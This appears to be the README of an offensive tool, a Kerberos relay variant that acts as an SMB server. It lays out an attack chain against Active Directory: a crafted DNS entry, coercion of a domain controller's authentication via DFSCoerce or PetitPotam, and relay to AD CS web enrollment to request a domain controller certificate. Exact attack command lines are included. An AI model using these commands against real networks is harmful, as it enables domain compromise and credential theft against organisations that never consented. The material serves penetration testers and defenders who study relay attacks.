This krbrelay version acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP.
It's 90% based on @cube0x0's KrbRelay: https://github.com/cube0x0/KrbRelay
To control the SPN for relaying, James Forshaw's CredMarshalTargetInfo() trick is required: https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
Create a DNS entry for the target server_name you want to relay the kerberos AP-REQ as: <server_name>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA and mapped to your listener/relay IP.
Domain users can typically perform secure DNS updates, for example you can use powershell script invoke-dnsupdate (https://github.com/Kevin-Robertson/Powermad) for adding a DNS entry
Trigger the SMB authentication with a third-party tool, for example DFSCoerce https://github.com/Wh04m1001/DFSCoerce, PetitPotam https://github.com/topotam/PetitPotam , etc... and relay it to the attacker machine.
Given that SMB port is 445 you have two options on the Windows attacker machine:
- use a Linux box acting as redirector
- disable the SERVER serice on your Windows machine -> you can use the smb_control.bat to perform these tasks.
This is a quick & dirty adaptation from original project, leaving cleanup and optimization to you ;)
# Relay the DC SMB authentication to HTTP (ADCS) web enrollment and request client certificate using a linux box redirecting to windows attacker machine on port 9999:<br>
krbRelay.exe -spn http/adcs-mylab.mylab.local -redirecthost adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs DomainController -listenerport 9999<br>
#In another window:
DFSCoerce.exe -l adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -t DC-2
(https://github.com/decoder-it/DFSCoerce-exe-2)
# special command line switches:
-listener: relay listener port
-redirecthost: relay server/redirector mapped to the sepcial DNS entry <server_name>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
For detailed usage and command line switches refer to original krbrelay tool
